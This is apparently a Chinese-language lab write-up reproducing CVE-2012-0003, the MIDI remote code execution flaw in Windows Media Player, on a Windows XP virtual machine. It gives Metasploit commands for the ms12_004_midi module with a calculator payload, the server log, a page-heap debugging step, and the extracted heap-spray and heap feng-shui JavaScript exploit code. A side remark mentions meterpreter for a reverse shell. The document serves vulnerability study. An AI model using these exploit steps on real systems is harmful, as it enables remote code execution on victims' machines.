https://cve.mitre.org:Unspecified vulnerability in winmm.dll in Windows Multimedia Library in Windows Media Player (WMP) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via a crafted MIDI file, aka "MIDI Remote Code Execution Vulnerability."
02-测试环境
目标系统:Windows XP SP3(虚拟机
OllyDebug:动态调试
IDA Pro:静态分析
IExplore 6、Media Player:漏洞软件
Metasploit:漏洞复现、利用
辅助工具:wget-保存mid文件到本地、gflags.exe-开启/关闭hpa、
03-漏洞复现
msf生成恶意文件
# 搜索并使用模块
msf5 > search cve-2012-0003
msf5 > use exploit/windows/browser/ms12_004_midi
# 设置payload
msf5 exploit(windows/browser/ms12_004_midi) > set payload windows/exec
# 设置payload参数,弹出计算器(exploit模块参数保持默认即可
msf5 exploit(windows/browser/ms12_004_midi) > set cmd calc.exe
# 攻击:开启服务器,等待目标连接
msf5 exploit(windows/browser/ms12_004_midi) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/browser/ms12_004_midi) >
[*] Using URL: http://0.0.0.0:8080/uMMCLOKsr
[*] Local IP: http://127.0.0.1:8080/uMMCLOKsr
[*] Server started.
目标机器xp用IE浏览器打开此恶意URL,成功弹出计算器
注意:若目标机器中对IE浏览器开启页堆,则IE会直接报错,不会弹出(默认页堆是关闭的
msf中也得到相关记录
[*] 192.168.156.151 ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 192.168.156.151 ms12_004_midi - Sending html to 192.168.156.151:1184...
[*] 192.168.156.151 ms12_004_midi - Request as: Windows-Media-Player/9.00.00.4503
[*] 192.168.156.151 ms12_004_midi - Sending midi corruption file...
PS:也可设置payload为强大的meterpreter,获取反弹shell
04-准备工作
4.1-提取样本
页堆关闭情况下,计算器会弹出,但IE窗口会马上关闭,来不及提取html
故先将页堆开启,使其弹出报错框,而不至于让IE关闭。
C:\Program Files\Debugging Tools for Windows (x86)>gflags.exe -i IExplore.exe +hpa
Current Registry Settings for IExplore.exe executable are: 02000000
hpa - Enable page heap
// 第一部分:进行堆喷射
<script language='javascript'>
var heap_obj = new heapLib.ie(0x10000);
var code = unescape("xxxxxxxxxxxxxxxx");
var ORF = "%u0c0c%u0c0c";
var nops = unescape(ORF);
while (nops.length < 0x1000) nops+= nops;
var shellcode = nops.substring(0,0x800 - code.length) + code;
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=0; i < 600; i++) {
heap_obj.alloc(block);
}
</script>
// 第二部分:漏洞利用的关键部分
<script language='javascript'>
var heap = new heapLib.ie();
var selob = document.createElement("select")
selob.w0 = unescape("%u0c0c%u0c0c")
selob.w1 = alert
...
selob.w55 = alert
var clones = new Array(1000);
function feng_shui() {
var i = 0;
while (i < 1000) {
clones[i] = selob.cloneNode(true)
i = i + 1;
}
var j = 0;
while (j < 1000) {
delete clones[j];
CollectGarbage();
j = j + 2;
}
}
feng_shui();
function trigger(){
var k = 999;
while (k > 0) {
if (typeof(clones[k].w0) == "string") {
} else {
clones[k].w0('come on!');
}
k = k - 2;
}
feng_shui();
document.audio.Play();
}
</script>